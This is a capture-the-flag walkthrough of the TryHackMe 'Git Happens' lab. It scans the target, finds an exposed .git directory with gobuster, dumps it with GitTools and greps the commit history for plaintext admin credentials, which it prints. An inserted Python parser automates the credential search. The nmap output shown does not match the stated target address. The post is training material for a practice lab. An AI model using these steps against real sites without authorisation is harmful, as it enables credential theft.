In this CTF (Capture the Flag) walkthrough, we will be working through the TryHackMe challenge, Git Happens!
If you don’t want any spoilers, I’d recommend trying out this free hacking challenge first before reading any further. You can also watch the video where I’ll walk you through the whole challenge:
We’ll be hacking into a git repository and extracting the username:password combination for the administrative portal.
We’ll make use of GitTools to extract the early git commits and comments. The final step is to use some clever command line text parsing to quickly narrow things down to our password and username.

First let’s export our IPs:
export myIP=10.6.2.23
export targetIP=10.10.122.132
Now we’ll go ahead and connect to the TryHackMe VPN from our Kali VM (Virtual Machine). In the walkthrough video, I am running Manjaro Linux with a virtual Kali machine running on Gnome Boxes.
sudo openvpn kalisurfer.ovpn
Now that we are properly connected to our target machine let’s start the first phase of our hack.
ENUMERATION

Our standard Nmap scan has a few extra flags today to extend the functionality.
sudo nmap $targetIP -Pn -p- -sC -A -O -oN nmap-scan-results.txt
- -Pn = skip host discovery (treat the host as up)
- -p- = scan all ports
- -sC = run standard scripts
- -A = enable OS detection, version detection, script scanning, and traceroute
- -O = detect operating system
- -oN [filename] = output in normal format to [filename]
Output:
# Nmap 7.93 scan initiated Tue Dec 13 10:51:00 2022 as: nmap -Pn -sC -p- -O -oN nmap-scan.txt 10.112.132
Nmap scan report for 10.112.132 (10.112.0.132)
Host is up (0.0012s latency).
All 65535 scanned ports on 10.112.132 (10.112.0.132) are in ignored states.
Not shown: 64535 filtered tcp ports (net-unreach), 1000 filtered tcp ports (no-response)
Too many fingerprints match this host to give specific OS details
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Dec 13 10:54:32 2022 -- 1 IP address (1 host up) scanned in 212.47 seconds
WALKING THE WEBSITE

We discover a login page by loading up our browser to our $targetIP. We try a few guesses of standard administrator user:password combinations without any luck:
admin:admin, admin:password, admin:password123
DIRECTORY SNIFFING WITH GOBUSTER
Next, we will sniff out directories with GoBuster. With the following command, we discover a hidden page at $targetIP/.git/
gobuster dir -w ~/hacking-tools/SecLists/Discovery/Web-Content/dirsearch.txt --url http://10.10.122.132
The hidden page looks like an index of the Git repo. We can download the files individually, but with GitTools we can extract even more metadata from the Git repo.
USING GITTOOLS TO EXTRACT REPO METADATA
First, we’ll download GitTools from the official GitHub repo.
After navigating into the new GitTools directory, we run the gitdumper.sh script with our target address and download location.
Use the dumper:
./gitdumper.sh http://10.10.122.132/.git/ ~/THM/Git-Happens
Now we can view more details about the Git commits with the command ‘git log’.
COMMAND LINE TEXT PARSING
This next series of commands will help us to quickly narrow things down to our username:password combination.
git log | grep commit
This command displays the list of commits and their hashes.
git log | grep commit | cut -d " " -f2
Now we cut out just the list of hashes. The cut -d " " -f2 part of the command splits each line into fields using a space as the delimiter, and -f2 displays only field 2. If this were an Excel spreadsheet, it is as if we were only viewing column 2.
Next, we’ll pass that output as arguments to git show <hash> using xargs.
git log | grep commit | cut -d " " -f2 | xargs git show
Let’s extend the command a bit further to save the output to a .txt file.
git log | grep commit | cut -d " " -f2 | xargs git show > gitcommits.txt
We can look through this .txt file manually, but it is faster to use “grep password” to find text lines with the word “password”.
cat gitcommits.txt | grep password
And to find the username:
Now we can find the password in plaintext with a simple glance over the output.
found it!
admin:Th1s_1s_4_L0ng_4nd_S3cur3_P4ssw0rd!
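The text-parsing pipeline above (list the hashes, feed them to git show with xargs, grep the result) folded into a small parser, as an added example that is not part of the original walkthrough: it reads the concatenated git show output, attributes every credential-looking diff line to its commit, and separates quoted literal values from lookups such as getenv that mention the keyword but leak nothing. A "-" hit is a secret that a later commit removed but that remains recoverable from history, which is why a dumped .git directory is worth scanning in full. The commit ids, file name and password value are constructed for the example.

```python
import re
from typing import List, Tuple

# Constructed commit ids and a constructed sample of the concatenated `git show`
# output the walkthrough saves to gitcommits.txt (newest first; not real repo data).
C_OLD = "a1" * 20  # first commit: login page with hardcoded credentials
C_NEW = "b2" * 20  # later commit: credentials moved to environment variables
SAMPLE_GIT_SHOW = f"""\
commit {C_NEW}
    Move credentials out of source
--- a/index.php
+++ b/index.php
@@ -2,2 +2,2 @@
-$password = "CONSTRUCTED_EXAMPLE_PW";
+$password = getenv("APP_PASSWORD");
commit {C_OLD}
    Initial login page
--- /dev/null
+++ b/index.php
@@ -0,0 +1,3 @@
+<?php
+$username = "admin";
+$password = "CONSTRUCTED_EXAMPLE_PW";
"""

COMMIT_RE = re.compile(r"^commit ([0-9a-f]{40})\b")
SECRET_RE = re.compile(r"user(name)?|pass(word|wd)?|secret|api[_-]?key", re.IGNORECASE)
LITERAL_RE = re.compile(r"""\$?(\w+)\s*=\s*["']([^"']+)["']""")


def find_secrets(git_show_output: str) -> List[Tuple[str, str, str]]:
    """(commit, '+' or '-', line) for each diff line that mentions a credential keyword."""
    hits, commit = [], None
    for line in git_show_output.splitlines():
        m = COMMIT_RE.match(line)
        if m:
            commit = m.group(1)  # every following diff line belongs to this commit
        # Only diff body lines count; the ---/+++ file headers are skipped.
        elif line and line[0] in "+-" and not line.startswith(("+++", "---")):
            if SECRET_RE.search(line):
                hits.append((commit, line[0], line[1:].strip()))
    return hits


def literal_credentials(git_show_output: str) -> List[Tuple[str, str, str, str]]:
    """Narrow the hits to quoted literal assignments: (commit, change, name, value)."""
    creds = []
    for commit, change, line in find_secrets(git_show_output):
        m = LITERAL_RE.search(line)
        if m:  # getenv("APP_PASSWORD") has no quoted value after '=' and is dropped
            creds.append((commit, change, m.group(1), m.group(2)))
    return creds
```

Running literal_credentials over a real gitcommits.txt gives the username and password together with the commit that introduced them, instead of a bare grep line.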
Thanks for watching! Catch you next time.
Feel free to check out our other TryHackMe walkthrough:
👉 Recommended: Web Hacking 101: Solving the TryHackMe Pickle Rick “Capture The Flag” Challenge
Resources
The two tracks used as background music are used under creative commons licenses and were downloaded at https://freemusicarchive.org
- Mr. Frisby’s Beat Pocket – Cool Fountains
- Damiano Baldoni – Gothic trip with thunderhorse

I am a freelance ethical hacker/penetration tester. I have extensive experience in penetration testing and vulnerability assessments on web apps and servers. I am also fluent in Mandarin and have 15 years of experience as an edTech integration specialist, curriculum designer, and foreign language teacher. Here’s my personal website.